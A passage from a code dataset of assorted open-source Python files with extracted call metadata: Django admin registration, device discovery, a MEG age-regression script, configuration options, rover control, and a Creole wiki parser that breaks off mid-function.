| [((29, 0, 29, 64), 'django.contrib.admin.site.register', 'admin.site.register', ({(29, 20, 29, 38): 'ComponentInterface', (29, 40, 29, 63): 'ComponentInterfaceAdmin'}, {}), '(ComponentInterface, ComponentInterfaceAdmin)', False, 'from django.contrib import admin\n'), ((30, 0, 30, 74), 'django.contrib.admin.site.register', 'admin.site.register', ({(30, 20, 30, 43): 'ComponentInterfaceValue', (30, 45, 30, 73): 'ComponentInterfaceValueAdmin'}, {}), '(ComponentInterfaceValue, ComponentInterfaceValueAdmin)', False, 'from django.contrib import admin\n')] |
paragguruji/publishtimer | publishtimer/__init__.py | b0b68d6c4d450a2cc22d29725e43c2a1261f0f74 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 15:28:24 2016
@author: Parag Guruji, [email protected]
"""
from .helpers import setup_env
done = setup_env() | [] |
jjlawren/netdisco | netdisco/discoverables/nanoleaf_aurora.py | ffc3cd092bff359b1c1fc1ed51940624b3c8076b | """Discover Nanoleaf Aurora devices."""
from . import MDNSDiscoverable
class Discoverable(MDNSDiscoverable):
"""Add support for discovering Nanoleaf Aurora devices."""
def __init__(self, nd):
super(Discoverable, self).__init__(nd, '_nanoleafapi._tcp.local.')
| [] |
DavidSabbagh/meeg_power_regression | debug/compute_score_common_ts_RETREAT.py | d9cd5e30028ffc24f08a52966c7641f611e92ee6 | import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
n_sub, n_fb, n_ch, n_ch = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
| [((20, 5, 20, 60), 'sklearn.model_selection.KFold', 'KFold', (), '', False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((53, 12, 53, 66), 'os.path.join', 'op.join', ({(53, 20, 53, 36): 'cfg.path_outputs', (53, 38, 53, 65): '"""covs_allch_oas.float32.h5"""'}, {}), "(cfg.path_outputs, 'covs_allch_oas.float32.h5')", True, 'import os.path as op\n'), ((54, 13, 54, 52), 'mne.externals.h5io.read_hdf5', 'mne.externals.h5io.read_hdf5', ({(54, 42, 54, 51): 'file_covs'}, {}), '(file_covs)', False, 'import mne\n'), ((57, 8, 57, 37), 'mne.pick_types', 'mne.pick_types', (), '', False, 'import mne\n'), ((31, 11, 31, 35), 'numpy.linalg.eigh', 'np.linalg.eigh', ({(31, 26, 31, 34): 'covs_avg'}, {}), '(covs_avg)', True, 'import numpy as np\n'), ((36, 16, 36, 51), 'numpy.zeros', 'np.zeros', ({(36, 25, 36, 50): '(n_sub, n_fb, rank, rank)'}, {}), '((n_sub, n_fb, rank, rank))', True, 'import numpy as np\n'), ((46, 14, 46, 51), 'numpy.zeros', 'np.zeros', ({(46, 23, 46, 50): '(n_sub, n_fb, p * (p + 1) // 2)'}, {}), '((n_sub, n_fb, p * (p + 1) // 2))', True, 'import numpy as np\n'), ((63, 19, 63, 61), 'os.path.join', 'op.join', ({(63, 27, 63, 40): 'cfg.path_data', (63, 42, 63, 60): '"""participants.csv"""'}, {}), "(cfg.path_data, 'participants.csv')", True, 'import os.path as op\n'), ((67, 22, 67, 38), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((69, 10, 71, 39), 'sklearn.model_selection.cross_val_score', 'cross_val_score', (), '', False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((25, 19, 25, 33), 'numpy.array', 'np.array', ({(25, 28, 25, 32): 'covs'}, {}), '(covs)', True, 'import numpy as np\n'), ((56, 15, 56, 55), 'os.path.join', 'op.join', ({(56, 23, 56, 36): 'cfg.path_data', (56, 38, 56, 54): '"""info_allch.npy"""'}, {}), "(cfg.path_data, 'info_allch.npy')", True, 'import os.path as op\n'), ((68, 37, 68, 60), 'numpy.logspace', 'np.logspace', ({(68, 49, 68, 51): '-3', (68, 53, 68, 54): '5', (68, 56, 68, 59): '100'}, {}), '(-3, 5, 100)', True, 'import numpy as np\n'), ((40, 40, 40, 52), 'numpy.eye', 'np.eye', ({(40, 47, 40, 51): 'rank'}, {}), '(rank)', True, 'import numpy as np\n'), ((48, 28, 48, 62), 'pyriemann.tangentspace.TangentSpace', 'TangentSpace', (), '', False, 'from pyriemann.tangentspace import TangentSpace\n')] |
mengalong/bter | bter/publish.py | 7fa56f9c83429bc564e6d123498b14aae5c390b1 | # Copyright 2017~ mengalong <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import daiquiri
from six.moves.urllib import parse as urlparse
from stevedore import driver
logger = daiquiri.getLogger(__name__)
class PublisherManager(object):
def __init__(self, conf, url):
self.conf = conf
self.url = url
parsed_url = urlparse.urlparse(url)
logger.debug("The parsed url for publisher is :%s" % str(parsed_url))
self.publish_driver = driver.DriverManager(
'bter.publisher',
parsed_url.scheme,
invoke_args=(self.conf,),
invoke_on_load=True).driver
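# Minimal usage sketch (hypothetical scheme; assumes an oslo.config object `conf`
# and a plugin registered under the 'bter.publisher' entry-point namespace for
# that scheme):
#
#   manager = PublisherManager(conf, 'udp://127.0.0.1:9999')
#   publisher = manager.publish_driver  # plugin instance loaded by stevedore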
| [((20, 9, 20, 37), 'daiquiri.getLogger', 'daiquiri.getLogger', ({(20, 28, 20, 36): '__name__'}, {}), '(__name__)', False, 'import daiquiri\n'), ((28, 21, 28, 43), 'six.moves.urllib.parse.urlparse', 'urlparse.urlparse', ({(28, 39, 28, 42): 'url'}, {}), '(url)', True, 'from six.moves.urllib import parse as urlparse\n'), ((30, 30, 34, 32), 'stevedore.driver.DriverManager', 'driver.DriverManager', (), '', False, 'from stevedore import driver\n')] |
y19818/web3.py | web3/_utils/module_testing/math_contract.py | 32a85a287ab63220d1e0c06d77be74de595ff02f |
MATH_BYTECODE = (
"606060405261022e806100126000396000f360606040523615610074576000357c01000000000000"
"000000000000000000000000000000000000000000009004806316216f391461007657806361bc22"
"1a146100995780637cf5dab0146100bc578063a5f3c23b146100e8578063d09de08a1461011d5780"
"63dcf537b11461014057610074565b005b610083600480505061016c565b60405180828152602001"
"91505060405180910390f35b6100a6600480505061017f565b604051808281526020019150506040"
"5180910390f35b6100d26004808035906020019091905050610188565b6040518082815260200191"
"505060405180910390f35b61010760048080359060200190919080359060200190919050506101ea"
"565b6040518082815260200191505060405180910390f35b61012a6004805050610201565b604051"
"8082815260200191505060405180910390f35b610156600480803590602001909190505061021756"
"5b6040518082815260200191505060405180910390f35b6000600d9050805080905061017c565b90"
"565b60006000505481565b6000816000600082828250540192505081905550600060005054905080"
"507f3496c3ede4ec3ab3686712aa1c238593ea6a42df83f98a5ec7df9834cfa577c5816040518082"
"815260200191505060405180910390a18090506101e5565b919050565b6000818301905080508090"
"506101fb565b92915050565b600061020d6001610188565b9050610214565b90565b600060078202"
"90508050809050610229565b91905056"
)
MATH_ABI = [
{
"constant": False,
"inputs": [],
"name": "return13",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": True,
"inputs": [],
"name": "counter",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "amt", "type": "uint256"},
],
"name": "increment",
"outputs": [
{"name": "result", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
{"name": "b", "type": "int256"},
],
"name": "add",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [],
"name": "increment",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function"
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
],
"name": "multiply7",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"anonymous": False,
"inputs": [
{"indexed": False, "name": "value", "type": "uint256"},
],
"name": "Increased",
"type": "event",
},
]
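# A usage sketch (an assumption, not part of the fixture module): deploying the
# contract above and calling it through a connected Web3 instance passed in as `w3`.
def example_deploy_and_call(w3):
    # Build a contract factory from the fixture ABI and bytecode defined above.
    factory = w3.eth.contract(abi=MATH_ABI, bytecode=MATH_BYTECODE)
    tx_hash = factory.constructor().transact()
    receipt = w3.eth.waitForTransactionReceipt(tx_hash)
    math = w3.eth.contract(address=receipt['contractAddress'], abi=MATH_ABI)
    # Both calls are read-only here; multiply7 returns 7 * a, add returns a + b.
    return math.functions.add(7, 13).call(), math.functions.multiply7(6).call()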
| [] |
nuby/open_dnsdb | dnsdb/config.py | 7fec703d8458083f0e6826393656055556e9f0b2 | # -*- coding: utf-8 -*-
import os
import sys
from datetime import timedelta
from oslo.config import cfg
CONF = cfg.CONF
CONF.register_opts([
cfg.StrOpt('log-dir'),
cfg.StrOpt('log-file'),
cfg.StrOpt('debug'),
cfg.StrOpt('verbose'),
], 'log')
CONF.register_opts([
cfg.StrOpt('connection'),
cfg.StrOpt('data'),
], 'DB')
CONF.register_opts([
cfg.StrOpt('server'),
cfg.StrOpt('port'),
cfg.StrOpt('from_addr'),
cfg.StrOpt('info_list'),
cfg.StrOpt('alert_list'),
], 'MAIL')
CONF.register_opts([
cfg.StrOpt('allow_ip'),
cfg.StrOpt('secret_key'),
cfg.StrOpt('env'),
cfg.StrOpt('local_group'),
cfg.StrOpt('acl_dir'),
cfg.StrOpt('view_acl_group')
], 'etc')
CONF.register_opts([
cfg.IntOpt('dnsupdater_port'),
], 'api')
CONF.register_opts([
cfg.StrOpt('acl_groups'),
cfg.IntOpt('cname_ttl'),
cfg.StrOpt('view_zone')
], 'view')
CONF.register_opts([
cfg.StrOpt('base-url',
default='/',
help='The url prefix of this site.'),
cfg.StrOpt('run-mode',
default="werkzeug",
choices=('gunicorn', 'werkzeug'),
help="Run server use the specify mode."),
cfg.StrOpt('bind',
default='0.0.0.0',
help='The IP address to bind'),
cfg.IntOpt('port',
default=8080,
help='The port to listen'),
cfg.BoolOpt('debug',
default=False),
], 'web')
CONF.register_opts([
cfg.StrOpt('config',
default=None,
help='The path to a Gunicorn config file.'),
cfg.StrOpt('bind',
default='127.0.0.1:8888'),
cfg.IntOpt('workers',
default=0,
help='The number of worker processes for handling requests'),
cfg.BoolOpt('daemon',
default=False,
help='Daemonize the Gunicorn process'),
cfg.StrOpt('accesslog',
default=None,
help='The Access log file to write to.'
'"-" means log to stderr.'),
cfg.StrOpt('loglevel',
default='info',
help='The granularity of Error log outputs.',
choices=('debug', 'info', 'warning', 'error', 'critical')),
cfg.BoolOpt('ignore-healthcheck-accesslog',
default=False),
cfg.IntOpt('timeout',
default=30,
help='Workers silent for more than this many seconds are '
'killed and restarted.'),
cfg.StrOpt('worker-class',
default='sync',
help='The type of workers to use.',
choices=('sync', 'eventlet', 'gevent', 'tornado'))
], 'gunicorn')
def setup_config(app_env, app_kind, conf_dir):
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
class Config(object):
def __init__(self, app_env, app_kind, conf_dir):
# print 'conf_dir: ', conf_dir
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
self.SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
self.SQLALCHEMY_DATABASE_URI = CONF.DB.connection
self.SQLALCHEMY_TRACK_MODIFICATIONS = False
self.PERMANENT_SESSION_LIFETIME = timedelta(days=1)
# SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
# SQLALCHEMY_DATABASE_URI = CONF.DB.connection
# SQLALCHEMY_TRACK_MODIFICATIONS = False
# PERMANENT_SESSION_LIFETIME = timedelta(days=1)
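# A minimal bootstrap sketch (an assumption about intended usage; presumes a
# Flask-style `app` object and config files laid out as etc/<env>/common.conf and
# etc/<env>/<kind>.conf under `conf_dir`):
#
#   config = Config('dev', 'dnsdb', conf_dir)
#   app.config.from_object(config)
#
# setup_config() covers the case where only the oslo CONF namespace is needed.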
| [((12, 4, 12, 25), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(12, 15, 12, 24): '"""log-dir"""'}, {}), "('log-dir')", False, 'from oslo.config import cfg\n'), ((13, 4, 13, 26), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(13, 15, 13, 25): '"""log-file"""'}, {}), "('log-file')", False, 'from oslo.config import cfg\n'), ((14, 4, 14, 23), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(14, 15, 14, 22): '"""debug"""'}, {}), "('debug')", False, 'from oslo.config import cfg\n'), ((15, 4, 15, 25), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(15, 15, 15, 24): '"""verbose"""'}, {}), "('verbose')", False, 'from oslo.config import cfg\n'), ((19, 4, 19, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(19, 15, 19, 27): '"""connection"""'}, {}), "('connection')", False, 'from oslo.config import cfg\n'), ((20, 4, 20, 22), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(20, 15, 20, 21): '"""data"""'}, {}), "('data')", False, 'from oslo.config import cfg\n'), ((24, 4, 24, 24), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(24, 15, 24, 23): '"""server"""'}, {}), "('server')", False, 'from oslo.config import cfg\n'), ((25, 4, 25, 22), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(25, 15, 25, 21): '"""port"""'}, {}), "('port')", False, 'from oslo.config import cfg\n'), ((26, 4, 26, 27), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(26, 15, 26, 26): '"""from_addr"""'}, {}), "('from_addr')", False, 'from oslo.config import cfg\n'), ((27, 4, 27, 27), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(27, 15, 27, 26): '"""info_list"""'}, {}), "('info_list')", False, 'from oslo.config import cfg\n'), ((28, 4, 28, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(28, 15, 28, 27): '"""alert_list"""'}, {}), "('alert_list')", False, 'from oslo.config import cfg\n'), ((32, 4, 32, 26), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(32, 15, 32, 25): '"""allow_ip"""'}, {}), "('allow_ip')", False, 'from oslo.config import cfg\n'), ((33, 4, 33, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(33, 15, 33, 27): '"""secret_key"""'}, {}), "('secret_key')", False, 'from oslo.config import cfg\n'), ((34, 4, 34, 21), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(34, 15, 34, 20): '"""env"""'}, {}), "('env')", False, 'from oslo.config import cfg\n'), ((35, 4, 35, 29), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(35, 15, 35, 28): '"""local_group"""'}, {}), "('local_group')", False, 'from oslo.config import cfg\n'), ((36, 4, 36, 25), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(36, 15, 36, 24): '"""acl_dir"""'}, {}), "('acl_dir')", False, 'from oslo.config import cfg\n'), ((37, 4, 37, 32), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(37, 15, 37, 31): '"""view_acl_group"""'}, {}), "('view_acl_group')", False, 'from oslo.config import cfg\n'), ((41, 4, 41, 33), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', ({(41, 15, 41, 32): '"""dnsupdater_port"""'}, {}), "('dnsupdater_port')", False, 'from oslo.config import cfg\n'), ((45, 4, 45, 28), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(45, 15, 45, 27): '"""acl_groups"""'}, {}), "('acl_groups')", False, 'from oslo.config import cfg\n'), ((46, 4, 46, 27), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', ({(46, 15, 46, 26): '"""cname_ttl"""'}, {}), "('cname_ttl')", False, 'from oslo.config import cfg\n'), ((47, 4, 47, 27), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', ({(47, 15, 47, 26): '"""view_zone"""'}, {}), "('view_zone')", False, 'from oslo.config import cfg\n'), ((51, 4, 53, 51), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((54, 4, 57, 55), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config 
import cfg\n'), ((58, 4, 60, 45), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((61, 4, 63, 41), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo.config import cfg\n'), ((64, 4, 65, 30), 'oslo.config.cfg.BoolOpt', 'cfg.BoolOpt', (), '', False, 'from oslo.config import cfg\n'), ((69, 4, 71, 58), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((72, 4, 73, 40), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((74, 4, 76, 75), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo.config import cfg\n'), ((77, 4, 79, 54), 'oslo.config.cfg.BoolOpt', 'cfg.BoolOpt', (), '', False, 'from oslo.config import cfg\n'), ((80, 4, 83, 47), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((84, 4, 87, 73), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((88, 4, 89, 30), 'oslo.config.cfg.BoolOpt', 'cfg.BoolOpt', (), '', False, 'from oslo.config import cfg\n'), ((90, 4, 93, 44), 'oslo.config.cfg.IntOpt', 'cfg.IntOpt', (), '', False, 'from oslo.config import cfg\n'), ((94, 4, 97, 65), 'oslo.config.cfg.StrOpt', 'cfg.StrOpt', (), '', False, 'from oslo.config import cfg\n'), ((131, 42, 131, 59), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n'), ((128, 26, 128, 54), 'os.environ.get', 'os.environ.get', ({(128, 41, 128, 53): '"""SECRET_KEY"""'}, {}), "('SECRET_KEY')", False, 'import os\n'), ((103, 24, 103, 44), 'sys.argv.index', 'sys.argv.index', ({(103, 39, 103, 43): '"""--"""'}, {}), "('--')", False, 'import sys\n'), ((118, 28, 118, 48), 'sys.argv.index', 'sys.argv.index', ({(118, 43, 118, 47): '"""--"""'}, {}), "('--')", False, 'import sys\n')] |
cloudy/osr-rover-code | rover/rover.py | 07d370ae1cde75eaf2d279fcc7f220c95cf6d736 | from __future__ import print_function
import time
from rover import Robot
from connections import Connections
class Rover(Robot, Connections):
def __init__( self,
config,
bt_flag = 0,
xbox_flag = 0,
unix_flag = 0
):
self.bt_flag = bt_flag
self.xbox_flag = xbox_flag
self.unix_flag = unix_flag
super(Rover,self).__init__(config)
self.prev_cmd = [None,None]
if bt_flag and xbox_flag:
raise Exception( "[Rover init] Cannot initialize with both bluetooth and Xbox, run with only one argument")
elif bt_flag: self.connection_type = "b"
elif xbox_flag: self.connection_type = "x"
self.connectController()
def drive(self):
try:
v,r = self.getDriveVals()
            if (v, r) != self.prev_cmd:
                self.sendCommands(v, r)
                self.prev_cmd = (v, r)
except KeyboardInterrupt:
self.cleanup()
except Exception as e:
print(e)
self.cleanup()
time.sleep(0.5)
self.connectController()
if self.unix_flag:
try:
self.sendUnixData()
except Exception as e:
print(e)
self.unix_flag = 0
def cleanup(self):
self.killMotors()
self.closeConnections()
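# A minimal drive-loop sketch (an assumption, not part of the original module;
# presumes a parsed `config` object and an attached Xbox controller):
def example_main(config):
    rover = Rover(config, xbox_flag=1)
    while True:
        # drive() polls the controller, forwards (v, r) only when it changes,
        # and handles its own cleanup / reconnect on errors.
        rover.drive()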
| [] |
scanner/django-aswiki | aswiki/parser.py | 318908eeccc8da324846ac5ffc4d4a206f560521 | #
# File: $Id: parser.py 1865 2008-10-28 00:47:27Z scanner $
#
"""
This is where the logic and definition of our wiki markup parser lives.
We use the Python Creoleparser (which requires Genshi)
We make a custom dialect so that the parser can know the URL base for
all of the topics (pages) in the wiki and some additional goop so that
we can tell what other topics a given topic refers to.
"""
# system imports
#
from urllib import quote
from urlparse import urlparse
try:
import threading
except ImportError:
import dummy_threading as threading
# Django imports
#
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
# 3rd party imports
#
from creoleparser.dialects import create_dialect, creole10_base, creole11_base
from creoleparser.core import Parser
from genshi import builder
# We see if we have the 'typogrify' app installed. If we do we will
# use it for rendering our templates to prettify them a bit.
#
try:
from typogrify.templatetags.typogrify import typogrify
except ImportError:
def typogrify(text):
return text
# Model imports
#
from aswiki.models import Topic
############################################################################
############################################################################
#
class TopicList(object):
"""
A helper class we use to keep track of all of the topics that are
    referenced by the raw content for a specific topic. We pass this
    object's method 'path_fn' in to the 'path_func' parameter
    of our creole dialect we are going to generate.
The point of this class is that we need to know what topics are
referenced by a specific topic when its content is created or
    modified. This lets us know the list of topics by their topic
names.
"""
########################################################################
#
def __init__(self):
"""
Very plain init. We set up the attribute for tracking topics.
"""
# The current topic that is being rendered, if we know it. This
# lets us root image url's relative to this topic.
#
self.current_topic = None
# The list of topics that we have encountered while rendering
# some content. This should be reset between renders.
#
self.topics = []
# A dict mapping the lower case topic name to the original case used
# in the text being parsed. This is so we can preserve the case
# when doing things like creating nascent topics.
#
self.topics_case = { }
        # This is another list. It contains Topic objects that we have
# found this topic referring to not via [[wiki links]] but via
# other methods like the <<subtopics >> macro. We need this so
# that when we are done rendering we can find out what other topics
# we should list in this topic's references.
#
self.extra_references = []
# This is a bit of ugliness. Since we instantiate a TopicList and pass
# a method when we create an instance of a Creole _dialect_ this one
# instance will be shared across this process instance which may well
# exist across multiple calls to render text via the parser generated
# from the dialect, which means our list of topics will grow every
# time we render a document.
#
# However, this is a problem since for our current use we only want
# the topic names from rendering a single topic. So we have to make
# sure no other thread of execution (if there are other threads
# running.. if not this is a cheap operation.. XXX I think) modifies
# the topic list we have to provide a mutex so only one thread at a
# time can add topics to a topic list.
#
self.lock = threading.Lock()
return
########################################################################
#
def clear_and_lock(self):
"""
Locks the mutex to prevent conflicts on updating the topic list if
        more than one thread tries to render using the same dialect instance
at the same time.
"""
self.lock.acquire()
self.topics = []
self.topics_case = { }
self.extra_references = []
return
########################################################################
#
def unlock(self):
"""
Unlocks the mutex. Do NOT access the topics parameter after this is
called. You can not be guaranteed whose list of topics you are seeing.
"""
self.lock.release()
return
##################################################################
#
def image_fn(self, image_name):
"""
This is called by our creole parser every time it hits an
image link. This lets us translate image names to be relative
to the topic they are found in as appropriate.
We only apply this magic transformation for images url's that
are relative.
Arguments:
- `image_name`: The name of the image being referenced.
"""
# If the image url is NOT absolute, root it relative to this
# topic.
#
u = urlparse(image_name)
if self.current_topic and len(u.path) > 0 and u.path[0] != "/":
return self.current_topic + "/" + image_name
return image_name
########################################################################
#
def path_fn(self, topic_name):
"""
This is called by our creole parser every time it encounters a
wiki link in the text it is parsing. This lets us track which
topics this text refers to.
We are passed in a topic name, and we return that topic
name.. if we were doing some sort of transformation on topic
names this is where it would happen.
Arguments:
- `topic_name`: The topic name being referenced as a wiki link.
"""
lower_topic_name = topic_name.lower()
# if this is a topic name we have not seen yet, add it to our list
# of topics.
#
if lower_topic_name not in self.topics:
self.topics.append(lower_topic_name)
self.topics_case[lower_topic_name] = topic_name
return topic_name
############################################################################
#
def class_fn(topic_name):
"""
This function is invoked by the markup dialect every time it encounters a
wiki topic. It returns a string that is the css class name to add to wiki
links as they are turned in to proper <a href></a> links.
We use this as a way to annotate topics that do not exist yet with some
graphical attribute so that users can easily tell which topics are not yet
created.
We use the wiki.models.TopicManager's css_class_name method to do this
lookup.
NOTE: Since this module is imported by the wiki.models module we need to
import that module inside here so that we can access the Topic
model. This is cheap since it will already be imported.
Arguments:
- `topic_name`: the topic name being checked for existence.
"""
# XXX This is where we should do a cache lookup of the topic name
# and only if that fails fall back to
# Topic.objects.css_class_name(topic_name)
#
return Topic.objects.css_class_name(topic_name)
####################################################################
#
def output_mailto(arg_string):
"""
    Given the arguments of the mailto macro, output the proper genshi
    stream that will render a mailto link. We also need to support the magic
    argument string format of '<you> AT <word> AT <foo> DOT <foo>'
    Arguments:
    - `arg_string`: The argument string of the mailto macro.
"""
# XXX Need to support the fancy format.. but for now just get the basic
# working.
return builder.tag.a(arg_string, href="mailto:%s" % arg_string)
####################################################################
#
def output_subtopics(arg_string):
"""
This will take a single string as its input. It will find all
topics for which the string as a topic name is the parent topic.
There is some semantic magic in a topic if it contains periods, ie: the
'.' character. This forms a kind of hierarchy. Loosely speaking all topics
that start with the same prefix, separated by '.' are sub-topics.
So: 2007.Agenda is a sub-topic of 2007. 2007.Agenda.foo is a subtopic of
2007 and 2007.Agenda.
This macro will insert in to the output <ul> of the topics that are proper
subtopics of the given string, ordered by name. So in the above example if
I were to say <<subtopics 2007>> it would give me "2007.Agenda" and
"2007.Agenda.foo" in a <ul>
If the arg string ends with a dot, then it is treated as the
separator. ie: <<subtopics 2007.>> and <<subtopics 2007>> are identical.
Arguments:
- `arg_string`: The topic we want to find all subtopics of.
"""
arg_string = arg_string
if arg_string[-1] != '.':
arg_string = arg_string + "."
topics = Topic.objects.filter(lc_name__istartswith = arg_string.lower()).order_by('lc_name')
if topics.count() == 0:
return None
ul = builder.tag.ul()
# For every topic that matches our pattern we insert a 'li' link
# to that topic in our output. We also add this topic to the
# 'extra_references' list in our global TOPIC_LIST object. This is
# so that the prerender../save() methods of the Topic object we are
# rendering this output for can know to add those topics to the list
# of topics referenced by the topic being rendered.
for topic in topics:
TOPIC_LIST.extra_references.append(topic)
ul.append(builder.tag.li(builder.tag.a(topic.name,
href = topic.get_absolute_url())))
return ul
####################################################################
#
def output_attachments(arg_string):
"""
Returns a <ul> of all of the attachments attached to the topic name
given as the arg_string.
Arguments:
- `arg_string`: Expected to be the name of a topic. If no such topic
exist, then no attachment list is generated.
"""
try:
topic = Topic.objects.get(lc_name = arg_string.lower())
except Topic.DoesNotExist:
return None
ul = builder.tag.ul()
# For every file attachment on this topic, add a 'li' link
# to that attachment.
#
for attachment in topic.file_attachments.all():
ul.append(builder.tag.li(builder.tag.a(attachment.basename(),
href = attachment.get_absolute_url())))
return ul
####################################################################
#
def macro_fn(name, arg_string, macro_body, block_type, environ):
"""
Handles the macros we define for our version of markup.
Arguments:
- `name`: The name of the macro
- `arg_string`: The argument string, including any delimiters
- `macro_body`: The macro body, None for macro with no body.
- `block_type`: True for block type macros.
- `environ` : The environment object, passed through from
creoleparser.core.Parser class's 'parse()' method.
"""
name = name.strip().lower()
arg_string = arg_string.strip()
if name == 'anchor':
if block_type:
return builder.tag.a(macro_body, name = arg_string)
else:
return builder.tag.a(name = arg_string)
elif name == 'mailto':
return output_mailto(arg_string)
elif name == 'gettext':
if block_type:
return _(macro_body)
else:
return _(arg_string)
elif name == 'subtopics':
return output_subtopics(arg_string)
elif name == 'attachlist':
return output_attachments(arg_string)
elif name == 'attachment':
# For including downloadable attachments in a wiki document.
if block_type:
